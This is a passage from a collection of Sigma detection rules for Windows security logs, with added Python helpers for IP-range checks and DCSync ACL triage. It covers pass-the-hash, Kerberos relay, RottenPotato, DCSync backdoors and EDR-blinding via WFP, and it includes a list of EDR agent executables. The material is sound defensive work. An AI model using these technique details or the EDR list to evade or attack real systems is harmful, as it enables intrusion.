    "content": "title: A Member Was Removed From a Security-Enabled Global Group\nid: 02c39d30-02b5-45d2-b435-8aebfe5a8629\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a member is removed from a security-enabled global group\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 633 # Security Enabled Global Group Member Removed\n            - 4729 # A member was removed from a security-enabled global group\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml",
    "content": "title: Successful Overpass the Hash Attempt\nid: 192a0330-c20b-4356-90b6-7b7049ae0b87\nstatus: test\ndescription: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.\nreferences:\n    - https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html\nauthor: Roberto Rodriguez (source), Dominik Schaudel (rule)\ndate: 2018-02-12\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.s0002\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: seclogo\n        AuthenticationPackageName: Negotiate\n    condition: selection\nfalsepositives:\n    - Runas command-line tool using /netonly parameter\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml",
    "content": "title: Pass the Hash Activity 2\nid: 8eef149c-bd26-49f2-9e5a-9b00e3af499b\nstatus: stable\ndescription: Detects the attack technique pass the hash which is used to move laterally inside the network\nreferences:\n    - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events\n    - https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\n    - https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/\nauthor: Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)\ndate: 2019-06-14\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\n    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624\ndetection:\n    selection_logon3:\n        EventID: 4624\n        SubjectUserSid: 'S-1-0-0'\n        LogonType: 3\n        LogonProcessName: 'NtLmSsp'\n        KeyLength: 0\n    selection_logon9:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: 'seclogo'\n    filter:\n        TargetUserName: 'ANONYMOUS LOGON'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml",
    "content": "title: RDP Login from Localhost\nid: 51e33403-2a37-4d66-a574-1fda1782cc31\nstatus: test\ndescription: RDP login with localhost source address may be a tunnelled login\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nauthor: Thomas Patzke\ndate: 2019-01-28\nmodified: 2022-10-09\ntags:\n    - attack.lateral-movement\n    - car.2013-07-002\n    - attack.t1021.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n        IpAddress:\n            - '::1'\n            - '127.0.0.1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml",
    "content": "title: A Security-Enabled Global Group Was Deleted\nid: b237c54b-0f15-4612-a819-44b735e0de27\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a security-enabled global group is deleted\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4730 # A security-enabled global group was deleted\n            - 634 # Security Enabled Global Group Deleted\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml",
    "content": "title: External Remote RDP Logon from Public IP\nid: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2\nrelated:\n    - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc\n      type: derived\nstatus: test\ndescription: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.\nreferences:\n    - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\n    - https://twitter.com/Purp1eW0lf/status/1616144561965002752\nauthor: Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)\ndate: 2023-01-19\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1133\n    - attack.t1078\n    - attack.t1110\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_empty:\n        IpAddress: '-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate or intentional inbound connections from public IP addresses on the RDP port.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml",
    "content": "title: External Remote SMB Logon from Public IP\nid: 78d5cab4-557e-454f-9fb9-a222bd0d5edc\nrelated:\n    - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2\n      type: derived\nstatus: test\ndescription: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.\nreferences:\n    - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html\n    - https://twitter.com/Purp1eW0lf/status/1616144561965002752\nauthor: Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)\ndate: 2023-01-19\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1133\n    - attack.t1078\n    - attack.t1110\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    filter_main_empty:\n        IpAddress: '-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate or intentional inbound connections from public IP addresses on the SMB port.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml",
    "content": "title: Failed Logon From Public IP\nid: f88e112a-21aa-44bd-9b01-6ee2a2bbbed1\nstatus: test\ndescription: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625\nauthor: NVISO\ndate: 2020-05-06\nmodified: 2024-03-11\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\n    - attack.t1190\n    - attack.t1133\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4625\n    filter_main_ip_unknown:\n        IpAddress|contains: '-'\n    filter_main_local_ranges:\n        IpAddress|cidr:\n            - '::1/128'  # IPv6 loopback\n            - '10.0.0.0/8'\n            - '127.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - 'fc00::/7'  # IPv6 private addresses\n            - 'fe80::/10'  # IPv6 link-local addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate logon attempts over the internet\n    - IPv4-to-IPv6 mapped IPs\nlevel: medium\n"
  },
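Added example, not code from the Sigma project: the `IpAddress|cidr` exclusion shared by the three "from Public IP" rules above (RDP, SMB and failed logon), implemented with the standard library, beside the IPv4-mapped IPv6 case that the failed-logon rule lists as a false positive. The address strings are constructed samples; 203.0.113.0/24 is the TEST-NET-3 documentation range and stands in for a public address.

```python
"""Added example, not code from the Sigma project: the `IpAddress|cidr`
exclusion shared by the three "from Public IP" rules above, built on the
standard library, and the IPv4-mapped IPv6 case the failed-logon rule
lists as a false positive."""
import ipaddress

# The exclusion list transcribed from the rules.
LOCAL_RANGES = [ipaddress.ip_network(cidr) for cidr in (
    "::1/128", "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "169.254.0.0/16", "fc00::/7", "fe80::/10",
)]


def in_local_range(addr) -> bool:
    """ipaddress never matches a v6 address against a v4 network, so an
    IPv4-mapped v6 literal falls through unless it is unwrapped first."""
    return any(addr in net for net in LOCAL_RANGES)


def fires_as_written(ip_text: str) -> bool:
    """The rule taken literally: IpAddress is not '-' and the string, as
    logged, is in none of the listed ranges."""
    if ip_text == "-":
        return False
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:  # anything unparsable is treated as not local
        return True
    return not in_local_range(addr)


def normalize(ip_text: str):
    """ip_address for the logged string, with ::ffff:a.b.c.d unwrapped to
    the IPv4 it carries; None for the '-' placeholder Windows writes when
    no source address is known."""
    if ip_text == "-":
        return None
    addr = ipaddress.ip_address(ip_text)
    return getattr(addr, "ipv4_mapped", None) or addr


def fires_normalized(ip_text: str) -> bool:
    """Same rule after normalization: ::ffff:10.0.0.5 is treated as 10.0.0.5."""
    addr = normalize(ip_text)
    return addr is not None and not in_local_range(addr)


# Constructed sample source addresses (203.0.113.0/24 is the TEST-NET-3
# documentation range and stands in for a public address).
SAMPLE_SOURCES = [
    "203.0.113.7", "10.0.0.5", "-", "::ffff:10.0.0.5", "fe80::1", "::ffff:203.0.113.7",
]


def classify(sources=SAMPLE_SOURCES) -> dict:
    """source -> (fires as written, fires after normalization)."""
    return {src: (fires_as_written(src), fires_normalized(src)) for src in sources}


if __name__ == "__main__":
    for src, (literal, normalized) in classify().items():
        print(f"{src:>22}  as written={literal!s:5}  normalized={normalized}")
```

The row that matters is `::ffff:10.0.0.5`: a Windows host that logs the source as an IPv4-mapped IPv6 address sits in none of the listed ranges as a string, so the rule as written fires on an internal client. Normalizing before the range test, or adding `::ffff:10.0.0.0/104` style ranges for each private block, closes that gap.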
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml",
    "content": "title: Outgoing Logon with New Credentials\nid: def8b624-e08f-4ae1-8612-1ba21190da6b\nstatus: test\ndescription: Detects logon events that specify new credentials\nreferences:\n    - https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n    condition: selection\nfalsepositives:\n    - Legitimate remote administration activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml",
    "content": "title: Potential Privilege Escalation via Local Kerberos Relay over LDAP\nid: 749c9f5e-b353-4b90-a9c1-05243357ca4b\nstatus: test\ndescription: |\n    Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.\n    This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.\nreferences:\n    - https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g\n    - https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38\nauthor: Elastic, @SBousseaden\ndate: 2022-04-27\nmodified: 2024-08-13\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1548\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        AuthenticationPackageName: 'Kerberos'\n        IpAddress: '127.0.0.1'\n        TargetUserSid|startswith: 'S-1-5-21-'\n        TargetUserSid|endswith: '-500'\n    filter_main_ip_null:\n        IpPort: '0'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml",
    "content": "title: RottenPotato Like Attack Pattern\nid: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f\nstatus: test\ndescription: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like\nreferences:\n    - https://twitter.com/SBousseaden/status/1195284233729777665\nauthor: '@SBousseaden, Florian Roth'\ndate: 2019-11-15\nmodified: 2022-12-22\ntags:\n    - attack.collection\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1557.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        TargetUserName: 'ANONYMOUS LOGON'\n        WorkstationName: '-'\n        IpAddress:\n            - '127.0.0.1'\n            - '::1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml",
    "content": "title: Successful Account Login Via WMI\nid: 5af54681-df95-4c26-854f-2565e13cfab0\nstatus: stable\ndescription: Detects successful logon attempts performed with WMI\nreferences:\n    - Internal Research\nauthor: Thomas Patzke\ndate: 2019-12-04\nmodified: 2024-01-17\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        ProcessName|endswith: '\\WmiPrvSE.exe'\n    condition: selection\nfalsepositives:\n    - Monitoring tools\n    - Legitimate system administration\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml",
    "content": "title: Windows Filtering Platform Blocked Connection From EDR Agent Binary\nid: bacf58c6-e199-4040-a94f-95dea0f1e45a\nstatus: test\ndescription: |\n    Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\n    Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\n    - https://github.com/amjcyber/EDRNoiseMaker\n    - https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983\nauthor: '@gott_cyber'\ndate: 2024-01-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Filtering Platform Connection needs to be enabled'\ndetection:\n    selection:\n        EventID: 5157\n        Application|endswith:\n            - '\\AmSvc.exe' # Cybereason\n            - '\\cb.exe' # Carbon Black EDR\n            - '\\CETASvc.exe' # TrendMicro Apex One\n            - '\\CNTAoSMgr.exe' # TrendMicro Apex One\n            - '\\CrAmTray.exe' # Cybereason\n            - '\\CrsSvc.exe' # Cybereason\n            - '\\CSFalconContainer.exe' # CrowdStrike Falcon\n            - '\\CSFalconService.exe' # CrowdStrike Falcon\n            - '\\CybereasonAV.exe' # Cybereason\n            - '\\CylanceSvc.exe' # Cylance\n            - '\\cyserver.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\CyveraService.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\CyvrFsFlt.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\EIConnector.exe' # ESET Inspect\n            - '\\elastic-agent.exe' # Elastic EDR\n            - '\\elastic-endpoint.exe' # Elastic EDR\n            - '\\EndpointBasecamp.exe' # TrendMicro Apex One\n            - '\\ExecutionPreventionSvc.exe' # Cybereason\n            - '\\filebeat.exe' # Elastic EDR\n            - '\\fortiedr.exe' # FortiEDR\n            - '\\hmpalert.exe' # Sophos EDR\n            - '\\hurukai.exe' # Harfanglab EDR\n            - '\\LogProcessorService.exe' # SentinelOne\n            - '\\mcsagent.exe' # Sophos EDR\n            - '\\mcsclient.exe' # Sophos EDR\n            - '\\MsMpEng.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\MsSense.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\Ntrtscan.exe' # TrendMicro Apex One\n            - '\\PccNTMon.exe' # TrendMicro Apex One\n            - '\\QualysAgent.exe' # Qualys EDR\n            - '\\RepMgr.exe' # Carbon Black Cloud\n            - '\\RepUtils.exe' # Carbon Black Cloud\n            - '\\RepUx.exe' # Carbon Black Cloud\n            - '\\RepWAV.exe' # Carbon Black Cloud\n            - '\\RepWSC.exe' # Carbon Black Cloud\n            - '\\sedservice.exe' # Sophos EDR\n            - '\\SenseCncProxy.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseIR.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseNdr.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SenseSampleUploader.exe' # Microsoft Defender for Endpoint and Microsoft Defender Antivirus\n            - '\\SentinelAgent.exe' # SentinelOne\n            - '\\SentinelAgentWorker.exe' # SentinelOne\n            - '\\SentinelBrowserNativeHost.exe' # SentinelOne\n            - '\\SentinelHelperService.exe' # SentinelOne\n            - '\\SentinelServiceHost.exe' # SentinelOne\n            - '\\SentinelStaticEngine.exe' # SentinelOne\n            - '\\SentinelStaticEngineScanner.exe' # SentinelOne\n            - '\\sfc.exe' # Cisco Secure Endpoint (Formerly Cisco AMP)\n            - '\\sophos ui.exe' # Sophos EDR\n            - '\\sophosfilescanner.exe' # Sophos EDR\n            - '\\sophosfs.exe' # Sophos EDR\n            - '\\sophoshealth.exe' # Sophos EDR\n            - '\\sophosips.exe' # Sophos EDR\n            - '\\sophosLivequeryservice.exe' # Sophos EDR\n            - '\\sophosnetfilter.exe' # Sophos EDR\n            - '\\sophosntpservice.exe' # Sophos EDR\n            - '\\sophososquery.exe' # Sophos EDR\n            - '\\sspservice.exe' # Sophos EDR\n            - '\\TaniumClient.exe' # Tanium\n            - '\\TaniumCX.exe' # Tanium\n            - '\\TaniumDetectEngine.exe' # Tanium\n            - '\\TMBMSRV.exe' # TrendMicro Apex One\n            - '\\TmCCSF.exe' # TrendMicro Apex One\n            - '\\TmListen.exe' # TrendMicro Apex One\n            - '\\TmWSCSvc.exe' # TrendMicro Apex One\n            - '\\Traps.exe' # Palo Alto Networks Traps/Cortex XDR\n            - '\\winlogbeat.exe' # Elastic EDR\n            - '\\WSCommunicator.exe' # TrendMicro Apex One\n            - '\\xagt.exe' # Trellix EDR\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml",
    "content": "title: Azure AD Health Monitoring Agent Registry Keys Access\nid: ff151c33-45fa-475d-af4f-c2f93571f4fe\nstatus: test\ndescription: |\n    This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\n    This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\n    - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'Key'\n        ObjectName: '\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent'\n    filter:\n        ProcessName|contains:\n            - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe'\n            - 'Microsoft.Identity.Health.Adfs.InsightsService.exe'\n            - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe'\n            - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml",
    "content": "title: Azure AD Health Service Agents Registry Keys Access\nid: 1d2ab8ac-1a01-423b-9c39-001510eae8e8\nstatus: test\ndescription: |\n    This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\n    Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\n    This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\n    Make sure you set the SACL to propagate to its sub-keys.\nreferences:\n    - https://o365blog.com/post/hybridhealthagent/\n    - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-08-26\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1012\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n        ObjectType: 'Key'\n        ObjectName: '\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\ADHealthAgent'\n    filter:\n        ProcessName|contains:\n            - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe'\n            - 'Microsoft.Identity.Health.Adfs.InsightsService.exe'\n            - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe'\n            - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml",
    "content": "title: Powerview Add-DomainObjectAcl DCSync AD Extend Right\nid: 2c99737c-585d-4431-b61a-c911d86ff32f\nstatus: test\ndescription: Detects backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account, e.g. via the PowerView Add-DomainObjectAcl cmdlet with the DCSync extended rights. The grantee can then re-obtain the password hashes of any user or computer.\nreferences:\n    - https://twitter.com/menasec1/status/1111556090137903104\n    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\nauthor: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat\ndate: 2019-04-03\nmodified: 2022-08-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following event IDs: 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects; for those a custom audit rule needs to be set up (see https://github.com/OTRF/Set-AuditRule)'\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'ntSecurityDescriptor'\n        AttributeValue|contains:\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' # DS-Replication-Get-Changes-All\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' # DS-Replication-Get-Changes\n            - '89e95b76-444d-4c62-991a-0facbeda640c' # DS-Replication-Get-Changes-In-Filtered-Set\n    filter_main_dns_object_class:\n        ObjectClass:\n            - 'dnsNode'\n            - 'dnsZoneScope'\n            - 'dnsZone'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account.\nlevel: high\n"
  },
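Added example, not code from the Sigma project: the triage step the rule's false-positive note describes, done in code. Event 5136 carries the new `ntSecurityDescriptor` as an SDDL string; the block below picks out the object ACEs that grant one of the three replication control-access rights and lists the trustees that are not expected holders. The SDDL sample is constructed, and the baseline of expected trustees (SDDL aliases and the Domain Controllers / Enterprise Read-only Domain Controllers RIDs) is an assumption for a default domain that you would tune to your own.

```python
"""Added example, not code from the Sigma project: extract the replication
control-access ACEs from the SDDL that event 5136 carries in
AttributeValue for ntSecurityDescriptor, and list the trustees that are
not expected holders. The expected-trustee set is an assumption for a
default domain; tune it to yours."""
import re

# Control-access right GUIDs the rule above matches on.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# SDDL ACE syntax: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")

# Assumed baseline of legitimate holders, as SDDL aliases (BA Administrators,
# SY Local System, DD Domain Controllers, ED Enterprise Domain Controllers,
# DA Domain Admins, EA Enterprise Admins) and domain RIDs (516 Domain
# Controllers, 498 Enterprise Read-only DCs). Anything else is surfaced.
EXPECTED_ALIASES = {"BA", "SY", "DD", "ED", "DA", "EA"}
EXPECTED_RID_SUFFIXES = ("-516", "-498")


def replication_grants(sddl: str) -> list:
    """(trustee, right name) for every allow-object ACE (type OA) whose
    rights include CR (control access) on one of the replication GUIDs."""
    grants = []
    for ace_type, _flags, rights, object_guid, _inherit, trustee in ACE_RE.findall(sddl):
        if ace_type != "OA" or "CR" not in rights:
            continue
        name = REPLICATION_RIGHTS.get(object_guid.lower())
        if name:
            grants.append((trustee, name))
    return grants


def suspicious_grants(sddl: str) -> list:
    """Replication grants to trustees outside the expected baseline. A SID
    listed here still has to be resolved: a freshly promoted DC's computer
    account looks the same as a backdoored user until you look it up."""
    return [
        (trustee, right)
        for trustee, right in replication_grants(sddl)
        if trustee not in EXPECTED_ALIASES and not trustee.endswith(EXPECTED_RID_SUFFIXES)
    ]


# Constructed sample: a domain-head descriptor with the usual DC/EDC grants
# plus two ACEs added for an ordinary user (RID 1105).
BACKDOOR_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{BACKDOOR_SID})"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{BACKDOOR_SID})"
)

if __name__ == "__main__":
    for trustee, right in suspicious_grants(SAMPLE_SDDL):
        print(f"{trustee} granted {right}")
```

Only object ACEs (`OA`) with `CR` in the rights field can carry these extended rights; the generic `A` ACE for Domain Admins in the sample also contains `CR`, but with no object GUID it grants all control-access rights and is not what the rule's GUID match is looking for.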
  {
    "path": "rules/windows/builtin/security/win_security_account_discovery.yml",
